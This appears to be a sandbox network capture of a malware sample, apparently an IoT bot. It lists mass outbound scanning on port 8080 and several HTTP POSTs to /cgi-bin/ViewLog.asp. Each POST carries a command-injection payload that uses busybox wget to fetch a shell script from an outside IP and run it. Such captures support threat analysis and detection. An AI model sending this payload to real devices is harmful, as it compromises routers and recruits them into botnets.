                                                              Nov 13, 2023 22:18:02.745646954 CET139488080192.168.2.2331.131.224.71
                                                              Nov 13, 2023 22:18:02.745659113 CET139488080192.168.2.2395.180.214.133
                                                              Nov 13, 2023 22:18:02.745659113 CET139488080192.168.2.2394.30.251.7
                                                              Nov 13, 2023 22:18:02.745668888 CET139488080192.168.2.2331.138.104.103
                                                              Nov 13, 2023 22:18:02.745671034 CET139488080192.168.2.2395.61.109.51
                                                              Nov 13, 2023 22:18:02.745663881 CET139488080192.168.2.2331.174.147.219
                                                              Nov 13, 2023 22:18:02.745671988 CET139488080192.168.2.2385.143.86.123
                                                              Nov 13, 2023 22:18:02.745685101 CET139488080192.168.2.2362.66.76.253
                                                              Nov 13, 2023 22:18:02.745686054 CET139488080192.168.2.2395.206.154.113
                                                              Nov 13, 2023 22:18:02.745685101 CET139488080192.168.2.2394.8.158.225
                                                              Nov 13, 2023 22:18:02.745691061 CET139488080192.168.2.2331.133.33.65
                                                              Nov 13, 2023 22:18:02.745704889 CET139488080192.168.2.2331.127.228.100
                                                              Nov 13, 2023 22:18:02.745708942 CET139488080192.168.2.2394.234.103.130
                                                              Nov 13, 2023 22:18:02.745718956 CET139488080192.168.2.2331.52.68.141
                                                              Nov 13, 2023 22:18:02.745724916 CET139488080192.168.2.2395.192.156.59
                                                              Nov 13, 2023 22:18:02.745738029 CET139488080192.168.2.2362.253.226.243
                                                              Nov 13, 2023 22:18:02.745738029 CET139488080192.168.2.2331.18.139.74
                                                              Nov 13, 2023 22:18:02.745747089 CET139488080192.168.2.2394.232.144.103
                                                              Nov 13, 2023 22:18:02.745748997 CET139488080192.168.2.2395.85.119.163
                                                              Nov 13, 2023 22:18:02.745754957 CET139488080192.168.2.2362.114.85.230
                                                              Nov 13, 2023 22:18:02.745765924 CET139488080192.168.2.2395.73.123.171
                                                              Nov 13, 2023 22:18:02.745776892 CET139488080192.168.2.2394.135.253.130
                                                              Nov 13, 2023 22:18:02.745786905 CET139488080192.168.2.2395.23.224.244
                                                              Nov 13, 2023 22:18:02.745805025 CET139488080192.168.2.2331.142.84.219
                                                              Nov 13, 2023 22:18:02.745805025 CET139488080192.168.2.2362.18.227.160
                                                              Nov 13, 2023 22:18:02.745806932 CET139488080192.168.2.2394.174.78.233
                                                              Nov 13, 2023 22:18:02.745820999 CET139488080192.168.2.2395.76.16.210
                                                              Nov 13, 2023 22:18:02.745837927 CET139488080192.168.2.2395.31.70.51
                                                              Nov 13, 2023 22:18:02.745842934 CET139488080192.168.2.2394.61.103.178
                                                              Nov 13, 2023 22:18:02.745842934 CET139488080192.168.2.2394.180.207.139
                                                              Nov 13, 2023 22:18:02.745872974 CET139488080192.168.2.2362.106.108.28
                                                              Nov 13, 2023 22:18:02.745872974 CET139488080192.168.2.2394.139.254.222
                                                              Nov 13, 2023 22:18:02.745877028 CET139488080192.168.2.2395.244.73.87
                                                              Nov 13, 2023 22:18:02.745877028 CET139488080192.168.2.2362.253.178.252
                                                              Nov 13, 2023 22:18:02.745877028 CET139488080192.168.2.2394.13.229.226
                                                              Nov 13, 2023 22:18:02.745887995 CET139488080192.168.2.2331.22.99.253
                                                              Nov 13, 2023 22:18:02.745887995 CET139488080192.168.2.2394.42.113.176
                                                              Nov 13, 2023 22:18:02.745896101 CET139488080192.168.2.2395.164.182.219
                                                              Nov 13, 2023 22:18:02.745902061 CET139488080192.168.2.2395.19.48.38
                                                              Nov 13, 2023 22:18:02.745907068 CET139488080192.168.2.2385.240.100.159
                                                              Nov 13, 2023 22:18:02.745907068 CET139488080192.168.2.2394.68.234.214
                                                              Nov 13, 2023 22:18:02.745910883 CET139488080192.168.2.2394.4.158.1
                                                              Nov 13, 2023 22:18:02.745928049 CET139488080192.168.2.2385.132.34.252
                                                              Nov 13, 2023 22:18:02.745934010 CET139488080192.168.2.2362.77.43.18
                                                              Nov 13, 2023 22:18:02.745943069 CET139488080192.168.2.2331.224.44.89
                                                              Nov 13, 2023 22:18:02.745955944 CET139488080192.168.2.2362.121.198.83
                                                              Nov 13, 2023 22:18:02.745958090 CET139488080192.168.2.2394.22.15.184
                                                              Nov 13, 2023 22:18:02.745973110 CET139488080192.168.2.2394.187.48.193
                                                              Nov 13, 2023 22:18:02.745990038 CET139488080192.168.2.2385.57.183.181
                                                              Nov 13, 2023 22:18:02.745995045 CET139488080192.168.2.2385.128.115.171
                                                              Nov 13, 2023 22:18:02.745995045 CET139488080192.168.2.2331.196.148.107
                                                              Nov 13, 2023 22:18:02.745995045 CET139488080192.168.2.2331.113.165.20
                                                              Nov 13, 2023 22:18:02.745995045 CET139488080192.168.2.2362.118.178.123
                                                              Nov 13, 2023 22:18:02.746000051 CET139488080192.168.2.2394.75.171.186
                                                              Nov 13, 2023 22:18:02.746007919 CET139488080192.168.2.2394.156.176.77
                                                              Nov 13, 2023 22:18:02.746011019 CET139488080192.168.2.2395.4.21.23
                                                              Nov 13, 2023 22:18:02.746014118 CET139488080192.168.2.2394.231.128.178
                                                              Nov 13, 2023 22:18:02.746020079 CET139488080192.168.2.2362.68.164.157
                                                              Nov 13, 2023 22:18:02.746028900 CET139488080192.168.2.2395.185.154.253
                                                              Nov 13, 2023 22:18:02.746028900 CET139488080192.168.2.2394.175.20.18
                                                              Nov 13, 2023 22:18:02.746037960 CET139488080192.168.2.2362.246.113.206
                                                              Nov 13, 2023 22:18:02.746057987 CET139488080192.168.2.2362.118.250.98
                                                              Nov 13, 2023 22:18:02.746057987 CET139488080192.168.2.2362.7.2.114
                                                              Nov 13, 2023 22:18:02.746058941 CET139488080192.168.2.2395.182.4.188
                                                              Nov 13, 2023 22:18:02.746069908 CET139488080192.168.2.2395.72.57.151
                                                              Nov 13, 2023 22:18:02.746081114 CET139488080192.168.2.2395.50.188.255
                                                              Nov 13, 2023 22:18:02.746082067 CET139488080192.168.2.2331.231.94.43
                                                              Nov 13, 2023 22:18:02.746082067 CET139488080192.168.2.2385.220.10.221
                                                              Nov 13, 2023 22:18:02.746090889 CET139488080192.168.2.2395.125.148.31
                                                              Nov 13, 2023 22:18:02.746092081 CET139488080192.168.2.2395.247.134.53
                                                              Nov 13, 2023 22:18:02.746114016 CET139488080192.168.2.2395.193.51.24
                                                              Nov 13, 2023 22:18:02.746119976 CET139488080192.168.2.2395.75.255.179
                                                              Nov 13, 2023 22:18:02.746124029 CET139488080192.168.2.2385.58.13.178
                                                              Nov 13, 2023 22:18:02.746128082 CET139488080192.168.2.2385.208.88.95
                                                              Nov 13, 2023 22:18:02.746133089 CET139488080192.168.2.2394.33.239.41
                                                              Nov 13, 2023 22:18:02.746149063 CET139488080192.168.2.2394.223.56.241
                                                              Nov 13, 2023 22:18:02.746149063 CET139488080192.168.2.2385.152.234.209
                                                              Nov 13, 2023 22:18:02.746149063 CET139488080192.168.2.2331.220.148.37
                                                              Nov 13, 2023 22:18:02.746155024 CET139488080192.168.2.2395.20.62.206
                                                              Nov 13, 2023 22:18:02.746174097 CET139488080192.168.2.2385.54.156.138
                                                              Nov 13, 2023 22:18:02.746174097 CET139488080192.168.2.2362.73.168.248
                                                              Nov 13, 2023 22:18:02.746174097 CET139488080192.168.2.2395.205.187.106
                                                              Nov 13, 2023 22:18:02.746174097 CET139488080192.168.2.2331.202.195.154
                                                              Nov 13, 2023 22:18:02.746191025 CET139488080192.168.2.2395.60.97.93
                                                              Nov 13, 2023 22:18:02.746195078 CET139488080192.168.2.2395.237.214.233
                                                              Nov 13, 2023 22:18:02.746195078 CET139488080192.168.2.2395.41.80.18
                                                              Nov 13, 2023 22:18:02.746197939 CET139488080192.168.2.2362.182.164.102
                                                              Nov 13, 2023 22:18:02.746197939 CET139488080192.168.2.2394.141.91.216
                                                              Nov 13, 2023 22:18:02.746220112 CET139488080192.168.2.2385.32.120.46
                                                              Nov 13, 2023 22:18:02.746220112 CET139488080192.168.2.2362.159.13.91
                                                              Nov 13, 2023 22:18:02.746220112 CET139488080192.168.2.2362.171.17.194
                                                              Nov 13, 2023 22:18:02.746222973 CET139488080192.168.2.2395.110.66.161
                                                              Nov 13, 2023 22:18:02.746231079 CET139488080192.168.2.2362.23.246.65
                                                              Nov 13, 2023 22:18:02.746237993 CET139488080192.168.2.2385.171.190.126
                                                              Nov 13, 2023 22:18:02.746272087 CET139488080192.168.2.2362.10.164.145
                                                              Nov 13, 2023 22:18:02.746272087 CET139488080192.168.2.2385.8.25.112
                                                              Nov 13, 2023 22:18:02.746273041 CET139488080192.168.2.2331.151.14.116
                                                              Nov 13, 2023 22:18:02.746272087 CET139488080192.168.2.2394.248.242.30
                                                              Nov 13, 2023 22:18:02.746272087 CET139488080192.168.2.2331.197.130.104
                                                              Nov 13, 2023 22:18:02.746294975 CET139488080192.168.2.2394.80.140.89
                                                              Nov 13, 2023 22:18:02.746294975 CET139488080192.168.2.2395.213.147.201
                                                              Nov 13, 2023 22:18:02.746296883 CET139488080192.168.2.2331.58.13.179
                                                              Nov 13, 2023 22:18:02.746299028 CET139488080192.168.2.2331.130.163.15
                                                              Nov 13, 2023 22:18:02.746303082 CET139488080192.168.2.2395.199.128.82
                                                              Nov 13, 2023 22:18:02.746311903 CET139488080192.168.2.2362.119.108.158
                                                              Nov 13, 2023 22:18:02.746320009 CET139488080192.168.2.2331.41.211.190
                                                              Nov 13, 2023 22:18:02.746323109 CET139488080192.168.2.2395.126.173.199
                                                              Nov 13, 2023 22:18:02.746323109 CET139488080192.168.2.2394.235.34.253
                                                              Nov 13, 2023 22:18:02.746340036 CET139488080192.168.2.2394.75.154.122
                                                              Nov 13, 2023 22:18:02.746345043 CET139488080192.168.2.2395.235.175.147
                                                              Nov 13, 2023 22:18:02.746362925 CET139488080192.168.2.2331.80.246.129
                                                              Nov 13, 2023 22:18:02.746362925 CET139488080192.168.2.2362.201.190.254
                                                              Nov 13, 2023 22:18:02.746362925 CET139488080192.168.2.2385.53.102.14
                                                              Nov 13, 2023 22:18:02.746362925 CET139488080192.168.2.2331.190.11.41
                                                              Nov 13, 2023 22:18:02.746365070 CET139488080192.168.2.2385.181.17.25
                                                              Nov 13, 2023 22:18:02.746381998 CET139488080192.168.2.2394.164.78.231
                                                              Nov 13, 2023 22:18:02.746382952 CET139488080192.168.2.2385.50.216.243
                                                              Nov 13, 2023 22:18:02.746393919 CET139488080192.168.2.2331.128.181.138
                                                              Nov 13, 2023 22:18:02.746408939 CET139488080192.168.2.2395.51.90.46
                                                              Nov 13, 2023 22:18:02.746408939 CET139488080192.168.2.2385.212.65.224
                                                              Nov 13, 2023 22:18:02.746408939 CET139488080192.168.2.2394.67.171.253
                                                              Nov 13, 2023 22:18:02.746424913 CET139488080192.168.2.2385.79.173.64
                                                              Nov 13, 2023 22:18:02.746428013 CET139488080192.168.2.2385.52.75.114
                                                              Nov 13, 2023 22:18:02.746448994 CET139488080192.168.2.2395.217.144.220
                                                              Nov 13, 2023 22:18:02.746453047 CET139488080192.168.2.2331.103.189.164
                                                              Nov 13, 2023 22:18:02.746454954 CET139488080192.168.2.2385.245.114.20
                                                              Nov 13, 2023 22:18:02.746459961 CET139488080192.168.2.2331.26.211.243
                                                              Nov 13, 2023 22:18:02.746459961 CET139488080192.168.2.2331.170.50.206
                                                              Nov 13, 2023 22:18:02.746476889 CET139488080192.168.2.2394.39.123.7
                                                              Nov 13, 2023 22:18:02.746478081 CET139488080192.168.2.2395.109.130.82
                                                              Nov 13, 2023 22:18:02.746483088 CET139488080192.168.2.2385.157.203.80
                                                              Nov 13, 2023 22:18:02.746493101 CET139488080192.168.2.2394.223.235.201
                                                              Nov 13, 2023 22:18:02.746500969 CET139488080192.168.2.2331.64.233.98
                                                              Nov 13, 2023 22:18:02.746501923 CET139488080192.168.2.2362.32.110.147
                                                              Nov 13, 2023 22:18:02.746517897 CET139488080192.168.2.2362.115.21.104
                                                              Nov 13, 2023 22:18:02.746536970 CET139488080192.168.2.2385.205.57.102
                                                              Nov 13, 2023 22:18:02.746536970 CET139488080192.168.2.2394.17.130.88
                                                              Nov 13, 2023 22:18:02.746555090 CET139488080192.168.2.2395.198.202.69
                                                              Nov 13, 2023 22:18:02.746556044 CET139488080192.168.2.2362.129.181.7
                                                              Nov 13, 2023 22:18:02.746566057 CET139488080192.168.2.2331.122.135.0
                                                              Nov 13, 2023 22:18:02.746582985 CET139488080192.168.2.2394.87.223.4
                                                              Nov 13, 2023 22:18:02.746582985 CET139488080192.168.2.2395.129.179.249
                                                              Nov 13, 2023 22:18:02.746582985 CET139488080192.168.2.2331.172.210.153
                                                              Nov 13, 2023 22:18:02.746589899 CET139488080192.168.2.2394.250.200.197
                                                              Nov 13, 2023 22:18:02.746599913 CET139488080192.168.2.2331.37.100.52
                                                              Nov 13, 2023 22:18:02.746615887 CET139488080192.168.2.2385.180.154.195
                                                              Nov 13, 2023 22:18:02.746617079 CET139488080192.168.2.2395.198.159.252
                                                              Nov 13, 2023 22:18:02.746629953 CET139488080192.168.2.2362.231.77.95
                                                              Nov 13, 2023 22:18:02.746632099 CET139488080192.168.2.2395.70.221.165
                                                              Nov 13, 2023 22:18:02.746634007 CET139488080192.168.2.2362.255.199.58
                                                              Nov 13, 2023 22:18:02.746640921 CET139488080192.168.2.2331.179.178.35
                                                              Nov 13, 2023 22:18:02.746640921 CET139488080192.168.2.2331.114.56.91
                                                              Nov 13, 2023 22:18:02.746644974 CET139488080192.168.2.2385.72.182.52
                                                              Nov 13, 2023 22:18:02.746651888 CET139488080192.168.2.2362.123.56.126
                                                              Nov 13, 2023 22:18:02.746654034 CET139488080192.168.2.2395.195.25.125
                                                              Nov 13, 2023 22:18:02.746675968 CET139488080192.168.2.2331.172.169.6
                                                              Nov 13, 2023 22:18:02.746675968 CET139488080192.168.2.2394.193.197.56
                                                              Nov 13, 2023 22:18:02.746692896 CET139488080192.168.2.2394.238.214.16
                                                              Nov 13, 2023 22:18:02.746694088 CET139488080192.168.2.2385.53.151.49
                                                              Nov 13, 2023 22:18:02.746704102 CET139488080192.168.2.2395.49.3.3
                                                              Nov 13, 2023 22:18:02.746711969 CET139488080192.168.2.2394.22.155.101
                                                              Nov 13, 2023 22:18:02.746712923 CET139488080192.168.2.2394.59.45.252
                                                              Nov 13, 2023 22:18:02.746711969 CET139488080192.168.2.2394.101.243.41
                                                              Nov 13, 2023 22:18:02.746721029 CET139488080192.168.2.2331.21.21.50
                                                              Nov 13, 2023 22:18:02.746737957 CET139488080192.168.2.2394.117.168.184
                                                              Nov 13, 2023 22:18:02.746737957 CET139488080192.168.2.2362.155.13.65
                                                              Nov 13, 2023 22:18:02.746743917 CET139488080192.168.2.2395.140.56.137
                                                              Nov 13, 2023 22:18:02.746761084 CET139488080192.168.2.2331.30.241.125
                                                              Nov 13, 2023 22:18:02.746761084 CET139488080192.168.2.2385.157.229.203
                                                              Nov 13, 2023 22:18:02.746761084 CET139488080192.168.2.2385.6.219.37
                                                              Nov 13, 2023 22:18:02.746764898 CET139488080192.168.2.2394.86.110.250
                                                              Nov 13, 2023 22:18:02.746773958 CET139488080192.168.2.2331.85.167.184
                                                              Nov 13, 2023 22:18:02.746788025 CET139488080192.168.2.2395.238.167.63
                                                              Nov 13, 2023 22:18:02.746790886 CET139488080192.168.2.2395.130.22.94
                                                              Nov 13, 2023 22:18:02.746793032 CET139488080192.168.2.2362.18.138.82
                                                              Nov 13, 2023 22:18:02.746814966 CET139488080192.168.2.2385.88.154.50
                                                              Nov 13, 2023 22:18:02.746814966 CET139488080192.168.2.2395.163.171.14
                                                              Nov 13, 2023 22:18:02.746814966 CET139488080192.168.2.2385.27.31.71
                                                              Nov 13, 2023 22:18:02.746819019 CET139488080192.168.2.2395.241.140.26
                                                              Nov 13, 2023 22:18:02.746823072 CET139488080192.168.2.2362.236.184.21
                                                              Nov 13, 2023 22:18:02.746824980 CET139488080192.168.2.2331.189.71.94
                                                              Nov 13, 2023 22:18:02.746829033 CET139488080192.168.2.2385.18.160.175
                                                              Nov 13, 2023 22:18:02.746839046 CET139488080192.168.2.2385.248.47.104
                                                              Nov 13, 2023 22:18:02.746845007 CET139488080192.168.2.2395.118.153.236
                                                              Nov 13, 2023 22:18:02.746845007 CET139488080192.168.2.2331.31.141.96
                                                              Nov 13, 2023 22:18:02.746865034 CET139488080192.168.2.2385.124.215.45
                                                              Nov 13, 2023 22:18:02.746870995 CET139488080192.168.2.2394.52.26.180
                                                              Nov 13, 2023 22:18:02.746874094 CET139488080192.168.2.2362.217.11.95
                                                              Nov 13, 2023 22:18:02.746887922 CET139488080192.168.2.2362.20.207.222
                                                              Nov 13, 2023 22:18:02.746891022 CET139488080192.168.2.2394.238.186.80
                                                              Nov 13, 2023 22:18:02.746891975 CET139488080192.168.2.2394.211.240.215
                                                              Nov 13, 2023 22:18:02.746897936 CET139488080192.168.2.2395.254.118.226
                                                              Nov 13, 2023 22:18:02.746905088 CET139488080192.168.2.2362.0.162.250
                                                              Nov 13, 2023 22:18:02.746920109 CET139488080192.168.2.2331.30.26.32
                                                              Nov 13, 2023 22:18:02.746922970 CET139488080192.168.2.2395.179.35.199
                                                              Nov 13, 2023 22:18:02.746925116 CET139488080192.168.2.2395.141.140.31
                                                              Nov 13, 2023 22:18:02.746929884 CET139488080192.168.2.2385.35.214.170
                                                              Nov 13, 2023 22:18:02.746947050 CET139488080192.168.2.2362.179.34.123
                                                              Nov 13, 2023 22:18:02.746946096 CET139488080192.168.2.2385.225.228.152
                                                              Nov 13, 2023 22:18:02.746948957 CET139488080192.168.2.2362.241.146.235
                                                              Nov 13, 2023 22:18:02.746963978 CET139488080192.168.2.2362.32.250.64
                                                              Nov 13, 2023 22:18:02.746969938 CET139488080192.168.2.2331.252.35.48
                                                              Nov 13, 2023 22:18:02.746969938 CET139488080192.168.2.2395.217.218.38
                                                              Nov 13, 2023 22:18:02.746987104 CET139488080192.168.2.2362.153.102.20
                                                              Nov 13, 2023 22:18:02.746987104 CET139488080192.168.2.2394.0.235.231
                                                              Nov 13, 2023 22:18:02.746988058 CET139488080192.168.2.2362.141.230.173
                                                              Nov 13, 2023 22:18:02.746999025 CET139488080192.168.2.2385.13.47.138
                                                              Nov 13, 2023 22:18:02.747004986 CET139488080192.168.2.2395.211.69.112
                                                              Nov 13, 2023 22:18:02.747004986 CET139488080192.168.2.2394.76.156.196
                                                              Nov 13, 2023 22:18:02.747008085 CET139488080192.168.2.2385.173.152.181
                                                              Nov 13, 2023 22:18:02.747013092 CET139488080192.168.2.2394.233.71.14
                                                              Nov 13, 2023 22:18:02.747018099 CET139488080192.168.2.2331.78.233.103
                                                              Nov 13, 2023 22:18:02.747033119 CET139488080192.168.2.2395.38.216.17
                                                              Nov 13, 2023 22:18:02.747034073 CET139488080192.168.2.2385.204.24.142
                                                              Nov 13, 2023 22:18:02.747035027 CET139488080192.168.2.2394.10.111.25
                                                              Nov 13, 2023 22:18:02.747052908 CET139488080192.168.2.2362.214.245.43
                                                              Nov 13, 2023 22:18:02.747056961 CET139488080192.168.2.2395.245.35.39
                                                              Nov 13, 2023 22:18:02.747067928 CET139488080192.168.2.2331.60.27.199
                                                              Nov 13, 2023 22:18:02.747068882 CET139488080192.168.2.2395.149.123.78
                                                              Nov 13, 2023 22:18:02.747078896 CET139488080192.168.2.2362.120.38.222
                                                              Nov 13, 2023 22:18:02.747096062 CET139488080192.168.2.2395.87.119.118
                                                              Nov 13, 2023 22:18:02.747096062 CET139488080192.168.2.2394.254.251.97
                                                              Nov 13, 2023 22:18:02.747098923 CET139488080192.168.2.2394.164.27.77
                                                              Nov 13, 2023 22:18:02.747103930 CET139488080192.168.2.2331.17.201.94
                                                              Nov 13, 2023 22:18:02.747103930 CET139488080192.168.2.2331.120.129.188
                                                              Nov 13, 2023 22:18:02.747112036 CET139488080192.168.2.2395.245.112.226
                                                              Nov 13, 2023 22:18:02.747113943 CET139488080192.168.2.2394.179.149.250
                                                              Nov 13, 2023 22:18:02.747128963 CET139488080192.168.2.2362.53.52.188
                                                              Nov 13, 2023 22:18:02.747137070 CET139488080192.168.2.2394.16.204.181
                                                              Nov 13, 2023 22:18:02.747139931 CET139488080192.168.2.2385.226.234.95
                                                              Nov 13, 2023 22:18:02.747152090 CET139488080192.168.2.2395.45.221.38
                                                              Nov 13, 2023 22:18:02.747153044 CET139488080192.168.2.2385.39.29.241
                                                              Nov 13, 2023 22:18:02.747154951 CET139488080192.168.2.2362.11.223.26
                                                              Nov 13, 2023 22:18:02.747169971 CET139488080192.168.2.2331.178.37.140
                                                              Nov 13, 2023 22:18:02.747170925 CET139488080192.168.2.2385.164.124.132
                                                              Nov 13, 2023 22:18:02.747172117 CET139488080192.168.2.2395.100.143.42
                                                              Nov 13, 2023 22:18:02.747184992 CET139488080192.168.2.2362.79.178.86
                                                              Nov 13, 2023 22:18:02.747188091 CET139488080192.168.2.2395.151.203.134
                                                              Nov 13, 2023 22:18:02.747203112 CET139488080192.168.2.2394.4.56.150
                                                              Nov 13, 2023 22:18:02.747204065 CET139488080192.168.2.2331.62.41.3
                                                              Nov 13, 2023 22:18:02.747206926 CET139488080192.168.2.2394.43.238.22
                                                              Nov 13, 2023 22:18:02.747209072 CET139488080192.168.2.2331.186.111.154
                                                              Nov 13, 2023 22:18:02.747226954 CET139488080192.168.2.2394.120.42.28
                                                              Nov 13, 2023 22:18:02.747226954 CET139488080192.168.2.2362.240.0.174
                                                              Nov 13, 2023 22:18:02.747227907 CET139488080192.168.2.2331.64.219.169
                                                              Nov 13, 2023 22:18:02.747227907 CET139488080192.168.2.2331.67.95.170
                                                              Nov 13, 2023 22:18:02.747246027 CET139488080192.168.2.2385.184.230.62
                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              0192.168.2.234725694.23.242.658080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:00.047493935 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1192.168.2.233330231.136.252.658080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:00.077049017 CET316OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:01.077405930 CET430OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:03.093261957 CET652OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:07.188601971 CET1033OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:15.379514933 CET1986OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:31.505503893 CET3967OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:03.757194042 CET7886OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              10192.168.2.235170685.125.241.1698080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:01.374902010 CET436OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
